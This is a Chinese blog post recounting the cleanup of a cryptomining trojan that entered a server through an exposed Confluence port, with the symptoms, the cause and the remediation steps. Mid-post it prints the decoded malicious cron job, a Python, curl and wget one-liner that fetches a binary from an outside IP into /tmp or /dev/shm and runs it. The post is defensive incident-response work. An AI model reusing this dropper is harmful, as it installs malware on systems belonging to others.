美文网首页
一次挖矿木马查杀

一次挖矿木马查杀

作者: Xinichi | 来源:发表于2019-05-25 10:52 被阅读0次

原因

木马通过Atlassian Confluence的端口后门入侵了confluence账号
安装时临时开了一下8090端口,后忘记关闭

避免措施

  • 安装软件时修改默认端口
  • 安装完成后立即关闭端口,用反向代理访问

症状

CPU占用100%
一个主进程占用CPU 100%,用户名confluence,Command为* **
多个其他进程不怎么占用CPU,用户名confluence,Command为ufw(不知道这个进程具体作用,但解决后发现切换confluence用户一直被踢出跟这个进程有关,而不是主进程)
主进程被Kill后恢复
切换confluence一直被踢出
阿里云安骑士有如下异常

  • 挖矿木马程序
  • 访问可疑IP
  • 异常登录

查杀过程

查找所有用户的crontab

cat /etc/passwd | cut -f 1 -d : |xargs -I {} crontab -l -u {}

发现有 * * * * * 的可疑定时任务,是Base64编码的Shell脚本,解码后如下

( if ! kill -0 15169  > /dev/null; then python -c 'import os,sys,urllib,os.path;nm=os.urandom(4).encode("hex"); hm=os.path.expanduser("~/"); paths =[hm,"/tmp/","/var/tmp/","/dev/shm/"]; l_pth=next(iter(pth for pth in paths if os.access(pth, os.F_OK|os.R_OK|os.W_OK|os.X_OK ) or []), None);h=l_pth+nm; hd = urllib.urlretrieve ("http://37.228.129.58/home/sync", h); f.close();os.system("chmod 7777 {}".format(h));os.system("chmod +x {}".format(h)); os.system("{}".format(h))' ; curl -o /dev/shm/irir http://37.228.129.58/home/sync ; chmod 777 /dev/shm/irir ; /dev/shm/irir ; wget -O /tmp/rdir http://37.228.129.58/home/sync ; chmod 777 /tmp/rdir ; /tmp/rdir ; fi )

找到下载挖矿程序的IP地址,在阿里云安全组内先禁止出方向所有端口
找到挖矿程序 /dev/shm/irir 并删除
杀掉主进程和其他进程
切换至confluence用户并删除crontab

su confluence
crontab -r

相关文章

  • 一次挖矿木马查杀

    原因 木马通过Atlassian Confluence的端口后门入侵了confluence账号安装时临时开了一下8...

  • 木马查杀

    今天初次接触了《人类木马查杀》,感觉有点欲罢不能。 以前我看过一本李欣频的书,但是感触不是很大。现在再看她的这本书...

  • 1014

    十月九日木马查杀复盘 关于查杀的一些认识: 001 、在个案查杀过程中,教练始终保持着一种肯定、包容、鼓励的态度耐...

  • 【Kali】linux木马查杀

    通常系统中木马或者病毒后会有各种各样的特征异常特征:1.网络流量2.异常进程3.消耗资源,如占用CPU、内存、硬盘...

  • 应急之木马查杀

    什么是手动查杀病毒技术 为什么要学习手工病毒查杀技术 当病毒文件隐藏时我们就要借用ark系列工具 什么是ARK系列...

  • 查杀木马——“优秀”

    今天破了自己的一个小木马:“不聪明就是笨。” 从小我对笨这个词很敏感,妈妈一直在用类似的词来辱骂我们,骂得超级难听...

  • 为什么总觉得自己不够好?

    第一次认识人类木马这个词,是看了李欣频的台湾版《21天人类木马查杀》。 第二次是读了古典老师的《拆掉思维里的墙》,...

  • 13.免查杀脚本木马编写

    免查杀木马编写的方法:把木马创建成函数,运行时调用函数、在线加密、组合法、变量覆盖 1.把木马创建成函数,运行时调...

  • 主机异常监控

    1、木马/后门查杀1-1:利用chkrootkit工具检测1-2:下载地址:http://www.chkrootk...

  • Linux运维之解决服务器挖矿木马问题

    1 挖矿木马 1.1 定义 挖矿木马会占用CPU进行超频运算,从而占用主机大量的CPU资源,严重影响服务器上的其他...

网友评论

      本文标题:一次挖矿木马查杀

      本文链接:https://www.haomeiwen.com/subject/vfdazqtx.html